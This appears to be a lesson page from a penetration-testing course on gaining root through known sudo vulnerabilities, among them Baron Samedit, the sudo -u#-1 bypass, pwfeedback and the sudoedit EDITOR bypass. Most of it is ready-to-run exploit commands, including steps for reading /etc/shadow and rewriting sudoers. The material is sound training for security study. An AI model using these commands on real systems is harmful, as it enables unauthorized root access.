Sudo CVE Exploitation | Linux Privilege Escalation

You've checked

and

GTFOBins

, but there's another angle: sudo itself might be vulnerable. Several critical CVEs in sudo have led to instant root, regardless of what commands you're allowed to run.

Think of sudo CVEs like finding a flaw in the lock mechanism itself, rather than finding an unlocked door. Even if you have no sudo privileges at all, a vulnerable sudo binary can give you root. Always check sudo --version.

Check Version First

Always run sudo --version early in enumeration. Vulnerable sudo versions are common on older systems and provide some of the easiest privilege escalation paths available.

Baron Samedit (CVE-2021-3156)

The most devastating sudo vulnerability ever. Baron Samedit is a heap-based buffer overflow that gives instant root on almost any sudo version from 2011-2021. No sudo privileges required - just the ability to run sudo (which almost everyone has).

bash

1606070;"># Affected Versions
2606070;"># sudo 1.8.2 through 1.8.31p2
3606070;"># sudo 1.9.0 through 1.9.5p1
4606070;"># Fixed in: 1.9.5p2
5 
6606070;"># Check sudo version
7sudo --version
8606070;"># Sudo version 1.8.21p2  ← VULNERABLE!
9 
10606070;"># Quick vulnerability test
11sudoedit -s '\' cat /etc/passwd
12606070;"># If you see error about "/etc/passwd": likely vulnerable
13606070;"># If clean exit or different error: might be patched
14 
15606070;"># Alternative test
16sudoedit -s /
17606070;"># malloc(): memory corruption = vulnerable
18606070;"># usage: sudoedit = patched
19 
20606070;"># === Exploit Methods ===
21 
22606070;"># Method 1: Searchsploit
23searchsploit sudo 1.8
24searchsploit -m 49521.py
25python3 49521.py
26 
27606070;"># Method 2: Pre-built exploits (multiple versions needed)
28git clone https:606070;">//github.com/blasty/CVE-2021-3156
29cd CVE-2021-3156
30make
31./sudo-hax-me-a-sandwich
32606070;"># Will ask for target version
33 
34606070;"># Method 3: Another PoC
35git clone https:606070;">//github.com/worawit/CVE-2021-3156
36cd CVE-2021-3156
37python3 exploit_nss.py
38606070;"># Or try different versions for your distro
39 
40606070;"># Common exploit variants:
41606070;"># - exploit_nss.py (NSS library)
42606070;"># - exploit_defaults.py
43606070;"># - exploit_lc_all.py
44 
45606070;"># If one fails, try another - different distros need different approaches

Baron Samedit Technical Details

1How Baron Samedit Works:
2├── sudoedit (symlink to sudo) processes arguments
3├── Backslash at end of argument isn't escaped properly
4├── Causes heap buffer overflow
5├── Overflow corrupts heap metadata
6├── Attacker crafts heap layout to hijack control flow
7├── Bypasses ASLR via information leak
8└── Result: Code execution as root
9 
10The Vulnerability:
11├── Input: sudoedit -s '\' anything
12├── Bug: Backslash escape handling in set_cmnd()
13├── Effect: Write past buffer boundary
14└── Impact: Heap corruption → code execution
15 
16Why It's So Bad:
17├── No sudo privileges needed (just calling sudo)
18├── Present for 10 years (2011-2021)
19├── Works on default configs
20├── Multiple exploitation techniques
21└── Affects virtually all Linux distros

Distro-Specific Exploits

Baron Samedit exploits often need to match the target distribution and sudo version exactly. If one exploit fails, try others. The heap layout varies between distributions.

CVE-2019-14287 (sudo -u#-1)

This is a logic bug, not a memory corruption. When sudoers allows running commands as "ALL users except root", a negative user ID bypasses the restriction. Elegant and simple.

bash

1606070;"># Affected: sudo < 1.8.28
2606070;"># Condition: sudoers file uses (ALL, !root) pattern
3 
4606070;"># Check sudo version
5sudo --version
6606070;"># Sudo version 1.8.21p2  ← Vulnerable if condition met
7 
8606070;"># Check sudoers entry
9sudo -l
10606070;"># (ALL, !root) /bin/bash
11606070;"># OR
12606070;"># (ALL, !root) ALL
13 
14606070;"># The vulnerability:
15606070;"># User ID -1 or 4294967295 (unsigned version of -1)
16606070;"># Gets interpreted as user ID 0 (root)
17 
18606070;"># Exploit
19sudo -u606070;">#-1 /bin/bash
20606070;"># id
21606070;"># uid=0(root)
22 
23606070;"># Alternative
24sudo -u606070;">#4294967295 /bin/bash
25606070;"># Same result - wraps to 0
26 
27606070;"># This works because:
28606070;"># - sudoers says "not root" (!root)
29606070;"># - We request user -1 (not root)
30606070;"># - But -1 in unsigned = 4294967295
31606070;"># - This converts to UID 0 in setresuid()
32606070;"># - Result: root despite !root rule

When CVE-2019-14287 Applies

bash

1606070;"># You need BOTH conditions:
2606070;"># 1. sudo < 1.8.28
3606070;"># 2. sudoers uses (ALL, !root) pattern
4 
5606070;"># Vulnerable sudoers examples:
6user ALL=(ALL, !root) /bin/bash
7user ALL=(ALL, !root) ALL
8user ALL=(ALL, !root) /usr/bin/vim
9 
10606070;"># NOT vulnerable:
11user ALL=(ALL) /bin/bash          606070;"># No !root
12user ALL=(root) /bin/bash         606070;"># Only root (opposite)
13user ALL=NOPASSWD: ALL            606070;"># No user restriction
14 
15606070;"># Check carefully in sudo -l output:
16sudo -l
17606070;"># Look for: (ALL, !root) patterns

Logic Bug = Reliable

Unlike memory corruption exploits, CVE-2019-14287 doesn't depend on memory layout or architecture. If the conditions exist, it works 100% of the time with a simple command.

CVE-2019-18634 (pwfeedback)

A stack-based buffer overflow triggered when sudo is configured with pwfeedback (shows asterisks when typing password). Less common but another avenue when conditions are right.

bash

1606070;"># Affected: sudo < 1.8.31 with pwfeedback enabled
2 
3606070;"># Check if pwfeedback is enabled
4sudo -l
5606070;"># If you see asterisks when typing password = enabled
6 
7cat /etc/sudoers 2>/dev/null | grep pwfeedback
8cat /etc/sudoers.d/* 2>/dev/null | grep pwfeedback
9606070;"># Defaults pwfeedback  ← vulnerable configuration
10 
11606070;"># Check version
12sudo --version
13606070;"># Needs to be < 1.8.31
14 
15606070;"># Exploitation
16606070;"># The exploit sends a large input to trigger overflow
17606070;"># Complex, requires specific conditions
18 
19606070;"># PoC:
20git clone https:606070;">//github.com/saleemrashid/sudo-cve-2019-18634
21cd sudo-cve-2019-18634
22make
23./exploit
24606070;"># Requires pwfeedback to be enabled
25 
26606070;"># Alternative manual test (may crash sudo):
27perl -e 606070;">#a5d6ff;">'print("A" x 1000000)' | sudo -S id
28606070;"># If vulnerable, may cause crash or code execution

CVE-2023-22809 (sudoedit Bypass)

A more recent sudoedit vulnerability. Allows editing arbitrary files when you have sudoedit access to specific files. Environment variable injection.

bash

1606070;"># Affected: sudo 1.8.0 through 1.9.12p1
2 
3606070;"># Condition: User has sudoedit access to a file
4 
5606070;"># Check for sudoedit permissions
6sudo -l
7606070;"># (root) NOPASSWD: sudoedit /etc/custom.conf
8606070;"># OR
9606070;"># (root) NOPASSWD: /usr/bin/sudoedit /etc/custom.conf
10 
11606070;"># The exploit uses EDITOR environment variable
12606070;"># Allows editing any file, not just the allowed one
13 
14606070;"># Exploit
15EDITOR=606070;">#a5d6ff;">'vim -- /etc/shadow' sudoedit /etc/custom.conf
16 
17606070;"># Or to get a shell:
18EDITOR=606070;">#a5d6ff;">'vim -- /etc/sudoers' sudoedit /etc/custom.conf
19606070;"># Add: user ALL=(ALL) NOPASSWD: ALL
20606070;"># Save and exit
21sudo su
22 
23606070;"># Alternative with different editors:
24EDITOR=606070;">#a5d6ff;">'nano -- /etc/passwd' sudoedit /etc/custom.conf

Requires Existing sudoedit

CVE-2023-22809 requires you to already have sudoedit permissions to some file. It escalates limited sudoedit to editing any file, not direct root from nothing.

Older Sudo CVEs

bash

1606070;"># === CVE-2017-1000367 (SELinux) ===
2606070;"># Affects: sudo with SELinux support
3606070;"># Requires: SELinux enabled system
4sudo --version
5getenforce  606070;"># Check SELinux status
6606070;"># Complex exploit, rarely seen in CTFs
7 
8606070;"># === CVE-2016-7076 ===
9606070;"># Affects: sudo < 1.8.18
10606070;"># Requires: Specific word matching in sudoers
11606070;"># Rarely applicable
12 
13606070;"># === CVE-2015-5602 ===
14606070;"># Affects: sudo < 1.8.15
15606070;"># sudoedit symlink race condition
16606070;"># Can edit arbitrary files
17 
18606070;"># === General Approach ===
19606070;"># 1. Check sudo --version
20606070;"># 2. Search: searchsploit sudo [version]
21606070;"># 3. Google: "sudo [version] CVE"
22606070;"># 4. Try applicable exploits

Sudo Version Quick Reference

1Sudo CVE Quick Reference:
2┌─────────────────────────────────────────────────────────────────┐
3│ CVE             │ Versions Affected    │ Requirement           │
4├─────────────────────────────────────────────────────────────────┤
5│ CVE-2021-3156   │ 1.8.2 - 1.9.5p1     │ None (just run sudo)  │
6│ Baron Samedit   │                      │                       │
7├─────────────────────────────────────────────────────────────────┤
8│ CVE-2019-14287  │ < 1.8.28            │ (ALL, !root) config   │
9│ -u606070;">#-1 bypass    │                      │                       │
10├─────────────────────────────────────────────────────────────────┤
11│ CVE-2019-18634  │ < 1.8.31            │ pwfeedback enabled    │
12│ pwfeedback      │                      │                       │
13├─────────────────────────────────────────────────────────────────┤
14│ CVE-2023-22809  │ 1.8.0 - 1.9.12p1    │ sudoedit permission   │
15│ sudoedit bypass │                      │                       │
16└─────────────────────────────────────────────────────────────────┘
17 
18Version Parsing:
19sudo --version
20606070;"># Sudo version 1.8.21p2
21606070;">#              ├─┬──┼─┬─
22606070;">#              │ │  │ └── Patch level
23606070;">#              │ │  └──── Minor version
24606070;">#              │ └─────── Major version
25606070;">#              └───────── Always 1

Sudo CVE Exploitation Flow

bash

1606070;"># Step-by-step methodology
2 
3606070;"># 1. Get sudo version
4sudo --version | head -1
5606070;"># Sudo version 1.8.21p2
6 
7606070;"># 2. Check Baron Samedit (most impactful)
8606070;"># Version 1.8.2 - 1.9.5p1?
9606070;"># Yes → Try Baron Samedit exploits
10 
11606070;"># 3. Check sudo -l output
12sudo -l
13606070;"># Look for (ALL, !root) patterns
14606070;"># If found → CVE-2019-14287
15 
16606070;"># 4. Check pwfeedback
17606070;"># Type password, see asterisks?
18606070;"># If yes and < 1.8.31 → CVE-2019-18634
19 
20606070;"># 5. Check sudoedit permissions
21606070;"># Have sudoedit access?
22606070;"># If yes and 1.8.0-1.9.12p1 → CVE-2023-22809
23 
24606070;"># 6. Search for other CVEs
25searchsploit sudo 1.8.21
26606070;"># Check results for applicable exploits
27 
28606070;"># 7. Test vulnerability (Baron Samedit)
29sudoedit -s '\' whatever
30606070;"># Error message indicates vulnerability

Sudo CVE Methodology

Sudo CVE Exploitation Flow

VersionRun sudo --version to get exact version

Baron SameditIf 1.8.2-1.9.5p1, try Baron Samedit first

sudo -lCheck for (ALL, !root) patterns for -u#-1

pwfeedbackCheck if asterisks show during password entry

sudoeditCheck for sudoedit permissions

SearchsploitSearch for version-specific exploits

Knowledge Check

Quick Quiz

Question 1 of 3

What makes Baron Samedit (CVE-2021-3156) so dangerous?

Challenges

Exploit Baron Samedit

Challenge

💀 advanced

Given a system with sudo version 1.8.21p2, exploit Baron Samedit to gain root access.

Need a hint? (4 available)

Bypass !root Restriction

Challenge

🔥 intermediate

You have sudo -l showing: (ALL, !root) /bin/bash. Sudo version is 1.8.16. Get root.

Need a hint? (4 available)

Key Takeaways

Always check sudo --version early in enumeration
Baron Samedit (CVE-2021-3156): sudo 1.8.2-1.9.5p1, no sudo privileges needed
CVE-2019-14287: sudo < 1.8.28 + (ALL, !root) = sudo -u#-1 bypass
Test Baron Samedit with: sudoedit -s '\'
Different distros may need different exploit variants
Sudo CVEs can give root even with no sudo permissions at all

Related Lessons

Sudo Fundamentals

Sudo Exploitation (GTFOBins)

Famous Kernel Exploits